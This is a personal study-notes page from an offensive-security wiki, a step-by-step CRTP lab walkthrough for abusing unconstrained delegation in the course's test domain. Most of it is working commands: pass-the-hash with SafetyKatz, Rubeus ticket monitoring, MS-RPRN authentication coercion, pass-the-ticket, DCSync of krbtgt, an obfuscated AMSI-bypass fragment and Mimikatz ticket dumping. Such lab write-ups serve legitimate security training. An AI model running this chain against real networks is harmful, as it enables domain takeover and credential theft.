👽
ALi3nW3rX
  • 👽ALi3NW3RX - Home Page
  • 🧧Resources
  • MITRE ATT&CK
  • Cyber Kill Chain
  • Education
    • ⚪Training Platforms
      • Attack & Defense
      • Hack The Box
      • Hack The Box Academy
      • Pentester Academy
      • Pentester Lab
      • PortSwigger Academy
      • Proving Grounds (PGP)
      • PwnTillDawn
      • Try Hack Me
    • 🟣Courses
      • Free Courses
        • API Penetration Testing Course
      • Paid Courses
        • OSCP
        • Pentester Academy
          • CRTP
            • CRTP Step By Step In Objectives
              • Obj 1 Enumeration
              • Obj 2 Enumeration
              • Obj 3 Enumeration
              • Obj 4 Enumeration
              • Obj 5 Local Priv Esc
              • Obj 6 BloodHound
              • Obj 7 Derivative Local Admin
              • Obj 8 Golden Ticket / DCSync
              • Obj 9 Silver Ticket for Host
              • Obj 10 Skeleton Key
              • Obj 11 DSRM
              • Obj 12 DCSync
              • Obj 13 Security Descriptors
              • Obj 14 Kerberoast Pass Crack
              • Obj 15 Unconstrained Delegation
            • CRTP Diagrams
          • CRTE
        • Hack The Box
          • CPTS
            • Common Terms (Cheat Sheet)
            • OWASP Top 10 2021
            • ACTIVE DIRECTORY ENUMERATION & ATTACKS
              • Enum Cheat Sheet
              • Tools of The Trade
              • Initial Enumeration of the Domain
              • LLMNR/NBT-NS Poisoning - from Linux
              • LLMNR/NBT-NS Poisoning - from Windows
              • Password Spraying Overview
              • Enumerating & Retrieving Password Policies
              • Password Spraying - Making a Target User List
              • Page 4
              • Page 3
              • Page 1
            • Page 2
  • Reverse Shells
    • revshells.com
  • C2
    • 🔴Cobalt Strike
      • Articles & Instructions
      • Resources
        • CS Cheat Sheet
        • Command Reference
        • Aggressor Scripts
        • RedTeam-OffensiveSecurity
      • Videos
  • WINDOWS
    • Active Directory Attack Map
    • Wadcoms
    • 🟢Recon
    • 🟢Enumeration
      • No Credentials
      • PowerView Enumeration
        • WMI
        • Domain Enumeration
        • Domain Trusts
        • Users
          • Find Local Admin Access
          • Find Active Sessions
        • Groups
        • Computers
        • Shares
        • GPO's
        • OU's
        • ACL's
      • Valid Credentials
    • 🟡FootHold
    • 🟡Local Priv Esc
      • PowerUp
      • ByPasses
      • Local Privilege Escalation
        • Local Priv Esc Using PowerUp.ps1
      • DSRM
    • 🟠Credential Harvesting
      • Dump NTDS.dit
    • 🟠Post Exploitation
    • 🟠Persistence
    • 🔴Domain Priv Esc
      • Domain Privilege Escalation
        • Enterprise Admins
        • DNS Admins
        • Constrained Delegation
        • Unconstrained Delegation
        • Set SPN
        • AS-REPS Roasting
        • Kerberoast
    • 🔴Lateral Movement & Pivoting
      • Lateral Movement
      • PowerShell Remoting
      • Reverse Shells
      • Pass The Hash
      • Over Pass The Hash
    • 🔴Attacks
      • DCSync
      • ACL
      • DSRM
      • AdminSDHolder
      • Print Nightmare
    • 🔴Forests & Trusts
      • Cross Forest Attacks
    • 🔵Defense & Hardening
    • 🔧Tools
      • BloodHound
      • Certipy
      • Commando-VM
      • CrackMapExec
        • CME Quick Reference
        • Protocols
          • SSH
            • Password Spraying
            • Authentication
            • Command Execution
          • MSSQL
            • Password Spraying
            • Authentication
            • Privesc
            • Command Execution
            • Upload/Download
            • Windows Commands
          • LDAP
            • Authentication
            • ASREPRoast
            • Find Domain SID
            • Kerberoasting
            • Unconstrained delegation
            • Admin Count
            • Machine Account Quota
            • Get user descriptions
            • Dump GMSA
            • Exploit ESC8 (ADCS)
            • Extract Subnet
            • LDAP Signing
            • Read DACL rights
          • FTP
            • Password Spraying
          • WINRM
            • Password Spraying
            • Authentication
            • Command Execution
            • LAPS
          • RDP
            • Password Spraying
            • Screenshot (Connected)
            • Screenshot (Not Connected)
        • Using Kerberos
        • Using Modules
        • Using The Database
        • BloodHound Integration
        • Scan for Vulnerabilities
        • Enumeration
          • Hosts
          • Null Sessions
          • Anonymous Login
          • Active Sessions
          • Shares and Access
          • Disks
          • Logged on Users
          • Domain Users
          • Users BruteForce RID
          • Domain Groups
          • Local Groups
          • Password Policy
          • SMB Signing NOT Required
        • Password Spraying
        • Authentication
          • Checking Domain Credentials
          • Checking Local Credentials
        • Command Execution
          • Remote Command Execution
          • Shells
        • Spidering Shares
        • Get and Put Files
        • Obtaining Credentials
          • Dump SAM
          • Dump LSA
          • Dump NTDS.dit
          • Dump LSASS
          • Dump WIFI Password
          • Dump KeyPass
        • LAPS
        • Spooler / WebDAV
        • MS Teams Cookies
      • Forensia
      • Inveigh
      • LaZagne
      • Ligolo / SSH Tunneling
      • LinWinPwn
      • MimiKatz.ps1
        • Golden Ticket
        • Silver Ticket
        • Skeleton Key
      • Rubeus
      • SharpCollection
      • SQLRecon
    • ✍️Scripts
      • FilelessNTDllReflection
      • FilelessRemotePE
      • ExecRemoteAssembly
  • Offensive Programming
    • RUST
      • Links
  • LINUX
    • Linux Terminal Commands
      • Git Cheat Sheet
      • Grep Cheat Sheet
    • Path to Root
    • Bash Cheat Sheet
    • Priv Esc
      • LD_Preload / SETENV
  • WEB APPS
    • Web Apps
      • LFI
      • XXE
  • DATABASES
    • Mysql
    • Postgresql
    • Redis
  • Common Tools & Commands
    • Protocols
      • FTP
      • RDP
      • SMB
      • SSH
    • Primary Tools
      • Hashcat
      • Responder
      • SQLMap
      • Chisel
      • CURL
      • XFREERDP
      • SSH
      • GOBUSTER
      • SNMP
      • NMAP
      • SMBCLIENT
      • WHATWEB
    • Editors
      • VIM
    • Misc Tools
      • ChatGPT
  • NETWORKING
    • Subnetting Cheat Sheet
  • SCRIPTS
    • Enum Scripts
  • MISC
    • Programming
      • GO
        • GoLangBot.Com
        • Ping Sweeper
      • NIM
    • Temp - Notes
Powered by GitBook
On this page
  • Find server with Unconstrained Delegation Enabled
  • Try one of the servers to see if we have local admin privileges
  • We are going to run Rubeus in listener mode on appsrv
  • Now we can run a DCSync attack from the new process
  • - Part 2 Elevate to Enterprise Admins -
  • We are now Enterprise Admins!
  • - Part 3 Check the server if there is an existing DA ticket
  • Let's start a new invishell on our host vm
  1. Education
  2. Courses
  3. Paid Courses
  4. Pentester Academy
  5. CRTP
  6. CRTP Step By Step In Objectives

Obj 15 Unconstrained Delegation

Task - Find a server in the dcorp domain where Unconstrained Delegation is enabled. Compromise the server and escalate to Domain Admin privileges. Escalate to Enterprise Admins privileges.

We first need to find a server that has unconstrained delegation enabled

Find server with Unconstrained Delegation Enabled

PS C:\AD\Tools> Get-DomainComputer -Unconstrained | select -ExpandProperty name

Since the prerequisite for elevation using Unconstrained delegation is having admin access to the machine, we need to compromise a user which has local admin access on appsrv. Recall that we extracted secrets of appadmin, srvadmin and websvc from dcorp-adminsrv. Let’s check if anyone of them have local admin privileges on dcorp-appsrv.

Try one of the servers to see if we have local admin privileges

C:\WINDOWS\system32> C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:appadmin 
/domain:dollarcorp.moneycorp.local 
/aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
/run:cmd.exe" "exit"

In the new process run the following commands to see if we have local admin access

C:\Windows\system32> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
PS C:\Windows\system32> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\Windows\system32> Find-PSRemotingLocalAdminAccess

We have local admin access on appsrv so we can copy Rubeus over 

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Rubeus.exe \\dcorpappsrv\C$\Users\Public\Rubeus.exe /Y

We are going to run Rubeus in listener mode on appsrv

C:\Windows\system32>winrs -r:dcorp-appsrv cmd
C:\Users\appadmin>C:\Users\Public\Rubeus.exe monitor /targetuser:DCORP-DC$ 
/interval:5 /nowrap

From student/host vm let's use MS-RPRN to force Authentication from dcorp-dc

C:\AD\Tools>C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local 
\\dcorp-appsrv.dollarcorp.moneycorp.local

We should start seeing some out put on our Rubeus listener now

User : DCORP-DC$@DOLLARCORP.MONEYCORP.LOCAL
 StartTime : 11/17/2021 12:27:42 AM
 EndTime : 11/17/2021 10:27:42 AM
 RenewTill : 11/21/2021 5:55:24 AM
 Flags : name_canonicalize, pre_authent, renewable, 
forwarded, forwardable
 Base64EncodedTicket :
 doIFxTCC..

Copy the base64 encoded ticket and use it with Rubeus on student VM. Run the below command from an elevated shell as the SafetyKatz command that we will use for DCSync needs to be run from an elevated process

>C:\AD\Tools\Rubeus.exe ptt /ticket:doIFx…

Now we can run a DCSync attack from the new process

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync 
/user:dcorp\krbtgt" "exit"

- Part 2 Elevate to Enterprise Admins -

To get Enterprise Admin privileges, we need to force authentication from mcorp-dc. Run the below command to listen for mcorp-dc$ tickets on dcorp-appsrv

Let's start a session on appsrv and setup a Rubeus listener

C:\Windows\system32>winrs -r:dcorp-appsrv cmd

C:\Users\appadmin>C:\Users\Public\Rubeus.exe monitor /targetuser:MCORP-DC$ 
/interval:5 /nowrap

Lets' run MS-RPRN on our host vm to trigger a response from mcorp-dc to dcorp-appsrv

C:\AD\Tools>C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorpappsrv.dollarcorp.moneycorp.local

We should get a response on our Rubeus listener

[*] 11/17/2021 3:36:16 PM UTC - Found new TGT:
 User : MCORP-DC$@MONEYCORP.LOCAL
 StartTime : 11/17/2021 12:40:19 AM
 EndTime : 11/17/2021 10:40:19 AM
 RenewTill : 11/21/2021 6:06:24 AM
 Flags : name_canonicalize, pre_authent, renewable, 
forwarded, forwardable
 Base64EncodedTicket :
 doIFVjCCBV

As previously, copy the base64 encoded ticket and use it with Rubeus on student VM. Run the below command from an elevated shell as the SafetyKatz command that we will use for DCSync needs to be run from an elevated process:

Run Rubeus to create a new process

C:\Windows\System32>C:\AD\Tools\Rubeus.exe ptt /ticket:doIFx…

Now we can run the DCSync attack from the new process

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync 
/user:mcorp\krbtgt /domain:moneycorp.local" "exit"

We are now Enterprise Admins!

- Part 3 Check the server if there is an existing DA ticket

Let's start a new invishell on our host vm

$sess = New-PSSession -ComputerName dcorpappsrv.dollarcorp.moneycorp.local
PS C:\AD\Tools> Enter-PSSession -Session $sess
[dcorp-appsrv]: PS C:\Users\appadmin\Documents> S`eT-It`em ( 'V'+'aR' +
[dcorp-appsrv]: PS C:\Users\appadmin\Documents> exit

Now let's get Mimikatz on the session and then go back into the session

PS C:\Windows\system32> Invoke-Command -FilePath C:\AD\Tools\InvokeMimikatz.ps1 -Session $sess

PS C:\Windows\system32> Enter-PSSession -Session $sess

Create a userX directory where X is your userId to avoid overwriting tickets of other users

[dcorp-appsrv]: PS C:\Users\appadmin\Documents> mkdir userX
[dcorp-appsrv]: PS C:\Users\appadmin\Documents> cd .\userX

Now let's invoke Mimikatz to dump the tickets

[dcorp-appsrv]: PS C:\Users\appadmin\Documents\userX> Invoke-Mimikatz -
Command '"sekurlsa::tickets /export"'

Now we can grep through the tickets to see which one we want to use.

[dcorp-appsrv.dollarcorp.moneycorp.local]: PS C:\Users\appadmin\Documents\userX> ls | select name

Once we find a ticket to reuse we can inject it into lsass to get DA privs

[dcorp-appsrv.dollarcorp.moneycorp.local]: PS C:\Users\appadmin\Documents\user1> Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\userX\[0;543c65]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Now we can check to see if it worked

[dcorp-appsrv.dollarcorp.moneycorp.local]:PS C:\Users\appadmin\Documents\userX> Invoke-Command -ScriptBlock{whoami;hostname} -computername dcorp-dc
dcorp\Administrator
dcorp-dc
PreviousObj 14 Kerberoast Pass CrackNextCRTP Diagrams

Last updated 2 years ago

🟣